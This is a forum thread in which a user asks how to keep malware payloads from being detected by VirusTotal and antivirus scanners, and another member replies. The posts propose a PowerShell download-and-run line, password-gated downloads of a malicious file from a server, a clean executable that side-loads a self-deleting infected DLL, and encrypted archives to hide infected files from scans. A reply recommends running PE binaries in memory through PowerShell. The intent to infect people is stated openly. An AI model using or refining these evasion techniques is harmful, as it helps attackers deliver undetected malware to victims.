• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

How bypass virustotal Scan

C

cacaocaca

Hi i m the people have to text on your youtube channe i would like how to bypass scan on virustotal becouse when i make one payload afther 5 days is detectable again so i can make payload forever afther 5 days .. So how i can bypass it ? I can create one payload where while i try to scan on virustotal the file is impossible to upload ? Or for bypass virustotal i can maybe use powershell that download another file while he run it this is just one example
PowerShell (New-Object System.Net.WebClient).DownloadFile(' 'a.exe'
Or another good idea is when the people execute the file for open really the file need some script with visual basic that open one windows where ask password for connect to your server and download yout file malicious but the password is store on your server not on your exe ;) or when the people execute exe original without virus he execute automatic another dll that is present on same folder and afther some time this dll delete automatic so virustotal don t have time for analizer the dll becouse is already delete . I don t know much of programmation but is much days that i think on it the night and i have found this idea tell me if you knwo another idea good when i can make one payload and i can stay secure that afther some days the file .exe no is again detected ..
 
Последнее редактирование модератором:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Hi i m the people have to text on your youtube channe i would like how to bypass scan on virustotal becouse when i make one payload afther 5 days is detectable again so i can make payload forever afther 5 days .. So how i can bypass it ? I can create one payload where while i try to scan on virustotal the file is impossible to upload ? Or for bypass virustotal i can maybe use powershell that download another file while he run it this is just one example
PowerShell (New-Object System.Net.WebClient).DownloadFile(' 'a.exe'
Or another good idea is when the people execute the file for open really the file need some script with visual basic that open one windows where ask password for connect to your server and download yout file malicious but the password is store on your server not on your exe ;) or when the people execute exe original without virus he execute automatic another dll that is present on same folder and afther some time this dll delete automatic so virustotal don t have time for analizer the dll becouse is already delete . I don t know much of programmation but is much days that i think on it the night and i have found this idea tell me if you knwo another idea good when i can make one payload and i can stay secure that afther some days the file .exe no is again detected ..
Hello bro) Thanks for your attention)
VirusTotal is a global problem... Many children (anonymous groups :D and others test many good tools and project on virustotal)
IMHO The Best Way powershell invoke methods and rum PE binaries in memory) If I'll find the time I will write about this little later,but I write all my method on russian language) Sorry bro,but I can't write on english only for you :(
In english can record only demo videos)
 
  • Нравится
Реакции: citizen2517
C

cacaocaca

Bro yes you can write on russian language yes but the script is universal language i need just this that work and if you make so one tutorial where i can look is good and please but do no share this video on youtube becouse is same if do you share on virustotal hahah and do no share this here on public forum,share it just on pvt is more good ;)
 
  • Нравится
Реакции: citizen2517 и <~DarkNode~>
C

cacaocaca

This idea is temporary.I was thinking since this program on the folder "have so much file dll" so how again bypass the people scan the file really infect ? I can t bypass the file and make not uploadable ? So how can i do ? Maybe i can use other way .. I can use some encryptation aes or other where av companie can t decrypt and where he can encrypt full folder and and when extract the output is one folder content all file inside and no file .zip .. The little difference is just need to have just some istruction on file.exe "clean without backdoor" where say that when the run file content software clean.exe execute so the dll infect present on same directory ? But what is the difference ? The difference is that this file have much file dll inside and other file so the people afther i have send the password for decrypt and want scan the file just scan the file .exe "the file clean" and do no think scan all dll file or other so when scan on virustotal look it clean and the av companie look the istruction where say run another dll but he do no see what dll becouse he not have upload it . Tell me if is can be good and more easy to do ;)
 
Последнее редактирование модератором:
  • Нравится
Реакции: citizen2517
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!